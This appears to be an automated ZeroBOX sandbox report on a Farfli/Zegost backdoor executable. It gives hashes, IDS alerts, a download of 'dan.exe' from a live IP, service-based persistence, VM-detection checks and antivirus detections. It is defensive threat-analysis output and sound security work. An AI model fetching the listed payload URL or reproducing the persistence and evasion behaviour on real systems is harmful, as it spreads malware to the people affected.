Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 25, 2023, 10:11 a.m.	April 25, 2023, 10:14 a.m.

Size	376.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`4cbe3baf25933bc9d0cb632422e70903`
SHA256	`1fbc2796e18c8c5ea32840f3eb64057379eb8198666b46160097491004de83e9`
CRC32	`0988CDC7`
ssdeep	`3072:RvK/yLrQbWaR5Qax8c/YtImroxSnOPMfZSa3aVz9TWF5UZ:ROyLEbWaR5CcPioxSOUH3abWF5UZ`
Yara	UPX_Zero - UPX packed file IsPE32 - (no description) PE_Header_Zero - PE File Signature Malicious_Library_Zero - Malicious_Library Generic_Malware_Zero - Generic Malware

MicOSOFTSearchProtocolHosb66.exe "C:\Users\test22\AppData\Local\Temp\MicOSOFTSearchProtocolHosb66.exe"
2556

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
156.236.72.163	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49164 -> 156.236.72.163:8080	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49164 -> 156.236.72.163:8080	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49162 -> 156.236.72.163:8080	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49162 -> 156.236.72.163:8080	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 156.236.72.163:8080 -> 192.168.56.101:49164	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 156.236.72.163:8080 -> 192.168.56.101:49162	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 156.236.72.163:8080 -> 192.168.56.101:49164	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 156.236.72.163:8080 -> 192.168.56.101:49164	2020500	ET EXPLOIT_KIT DRIVEBY Likely Evil EXE with no referer from HFS webserver (used by Unknown EK)	Exploit Kit Activity Detected
TCP 156.236.72.163:8080 -> 192.168.56.101:49164	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 156.236.72.163:8080 -> 192.168.56.101:49164	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 156.236.72.163:8080 -> 192.168.56.101:49164	2014520	ET INFO EXE - Served Attached HTTP	Misc activity
TCP 156.236.72.163:8080 -> 192.168.56.101:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 156.236.72.163:8080 -> 192.168.56.101:49162	2020500	ET EXPLOIT_KIT DRIVEBY Likely Evil EXE with no referer from HFS webserver (used by Unknown EK)	Exploit Kit Activity Detected
TCP 156.236.72.163:8080 -> 192.168.56.101:49162	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 156.236.72.163:8080 -> 192.168.56.101:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 156.236.72.163:8080 -> 192.168.56.101:49162	2014520	ET INFO EXE - Served Attached HTTP	Misc activity

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 25, 2023, 10:11 a.m.		1	1	0

The executable uses a known packer (1 event)

packer

InstallShield 2000

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

Connection to IP address

suspicious_request

GET http://156.236.72.163:8080/dan.exe

Performs some HTTP requests (1 event)

request

GET http://156.236.72.163:8080/dan.exe

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceExW April 25, 2023, 10:11 a.m.	total_number_of_free_bytes: 13323673600 free_bytes_available: 13323673600 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

Creates executable files on the filesystem (2 events)

file	C:\Program Files (x86)\Microsoft Mkomym\Gmosgou.exe
file	c:\dan.exe

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceA April 25, 2023, 10:11 a.m.	service_start_name: start_type: 2 password: display_name: Gmimmg smagkceo filepath: C:\Program Files (x86)\Microsoft Mkomym\Gmosgou.exe service_name: Rsabhc joodhrqe filepath_r: C:\Program Files (x86)\Microsoft Mkomym\Gmosgou.exe desired_access: 983551 service_handle: 0x005ba290 error_control: 1 service_type: 272 service_manager_handle: 0x005ba380	1	6005392	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000000c4 process_name: mobsync.exe process_identifier: 2284	1	1
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000000c4 process_name: taskhost.exe process_identifier: 2388	1	1
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000000c8 process_name: MicOSOFTSearchProtocolHosb66.exe process_identifier: 6553710		0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 2748	1	1
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 25, 2023, 10:11 a.m.	process_identifier: 2556 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 45056 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x10001000 process_handle: 0xffffffff	1	0	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 81 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000000c8 process_name: MicOSOFTSearchProtocolHosb66.exe process_identifier: 6553710		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0
Process32NextW April 25, 2023, 10:11 a.m.	snapshot_handle: 0x000003e4 process_name: Gmosgou.exe process_identifier: 7536751		0	0

Communicates with host for which no DNS query was performed (1 event)

host

156.236.72.163

Installs itself for autorun at Windows startup (1 event)

service_name

Rsabhc joodhrqe

service_path

C:\Program Files (x86)\Microsoft Mkomym\Gmosgou.exe

Expresses interest in specific running processes (2 events)

process	micosoftsearchprotocolhosb66.exe
process: potential process injection target	explorer.exe

File has been identified by 61 AntiVirus engines on VirusTotal as malicious (50 out of 61 events)

Bkav	W32.AIDetect.malware1
Lionic	Trojan.Win32.Farfli.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zegost.53
CAT-QuickHeal	Trojan.FarfliRI.S27090835
ALYac	Gen:Variant.Zegost.53
Malwarebytes	Malware.AI.152148258
VIPRE	Gen:Variant.Zegost.53
Sangfor	Suspicious.Win32.Save.ins
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	Backdoor:Win32/Farfli.0e06db30
K7GW	Trojan ( 00562edc1 )
K7AntiVirus	Trojan ( 00562edc1 )
Arcabit	Trojan.Zegost.53
Cyren	W32/Trojan.LBET-0583
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win32/Kryptik.HCAH
Cynet	Malicious (score: 100)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Backdoor.Win32.Farfli.gen
BitDefender	Gen:Variant.Zegost.53
NANO-Antivirus	Trojan.Win32.Kryptik.jmvgmk
Avast	Win32:BackdoorX-gen [Trj]
Tencent	Backdoor.Win32.farfli.zf
TACHYON	Trojan/W32.Agent.385024.ADI
Emsisoft	Gen:Variant.Zegost.53 (B)
F-Secure	Trojan.TR/Crypt.XPACK.Gen
DrWeb	Trojan.Siggen11.63246
Zillya	Trojan.Kryptik.Win32.3701711
TrendMicro	TROJ_GEN.R002C0DDH23
McAfee-GW-Edition	GenericRXLP-OX!4CBE3BAF2593
Trapmine	suspicious.low.ml.score
FireEye	Generic.mg.4cbe3baf25933bc9
Sophos	Troj/Farfli-EA
SentinelOne	Static AI - Suspicious PE
Jiangmin	Backdoor.Farfli.eqx
Webroot	W32.Gen.BT
Avira	TR/Crypt.XPACK.Gen
Antiy-AVL	Trojan[Backdoor]/Win32.Farfli
Xcitium	Backdoor.Win32.Farfli.FK@7jqjxo
Microsoft	Trojan:Win32/Farfli.CT!MTB
ViRobot	Trojan.Win.Z.Farfli.385024.DT
ZoneAlarm	HEUR:Backdoor.Win32.Farfli.gen
GData	Gen:Variant.Zegost.53
Google	Detected
AhnLab-V3	Malware/Win32.RL_Generic.R299466
McAfee	GenericRXLP-OX!4CBE3BAF2593
MAX	malware (ai score=84)
VBA32	Trojan.Farfli

MicOSOFTSearchProtocolHosb66.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All